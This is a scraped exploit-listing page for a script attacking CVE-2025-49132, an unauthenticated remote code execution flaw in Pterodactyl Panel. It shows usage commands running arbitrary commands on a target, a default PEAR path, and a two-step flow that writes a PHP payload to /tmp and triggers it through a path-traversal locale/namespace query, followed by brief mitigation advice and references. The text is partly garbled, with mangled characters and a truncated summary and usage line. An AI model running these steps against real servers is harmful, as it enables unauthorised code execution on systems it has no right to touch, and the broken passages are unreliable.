Share
## https://sploitus.com/exploit?id=3FBA1C46-B95F-56DB-AAF8-2E276C597DE9
# CVE-2025-49132
**Pterodactyl Panel - Unauthenticated Remote Code Execution (RCE)**
---
## ๐ Summary
**CVEโ2025โ49132** is a critical Remote Code
Execution vulnerability affecting **Pterodactyl Panel \ --cmd "" [--path ]
```
### Examples
```bash
python3 CVE-2025-49132-dbs.py --target victim.com --cmd "whoami"
python3 CVE-2025-49132-dbs.py --target 192.168.1.10 --cmd "id" --path /usr/local/lib/php/PEAR
```
Default path:
/usr/share/php/PEAR
Get Proper Path from `/phpinfo.php` page

---
## ๐ Exploitation Flow
### Step 1 - Write Payload
The attacker injects a malicious PHP payload into `/tmp/payload.php`
using:
/+/tmp/payload.php
### Step 2 --- Trigger Execution
By calling:
?locale=../../../../../tmp&namespace=payload
The server executes the injected PHP.
## 
## ๐ก Mitigation
- Upgrade to **Pterodactyl Panel \>= 1.11.11**
- Sanitize `locale` and `namespace` inputs
- Disable dangerous PHP functions
- Restrict unnecessary endpoint exposure
---
## ๐ References
- GitHub Advisory: [GHSA-24wv-6c99-f843](https://github.com/advisories/GHSA-24wv-6c99-f843)
- [CVE-2025-49132](https://nvd.nist.gov/vuln/detail/cve-2025-49132)
- [Pterodactyl Panel v1.11.11 Patch Commit](https://github.com/pterodactyl/panel/releases/tag/v1.11.11)
---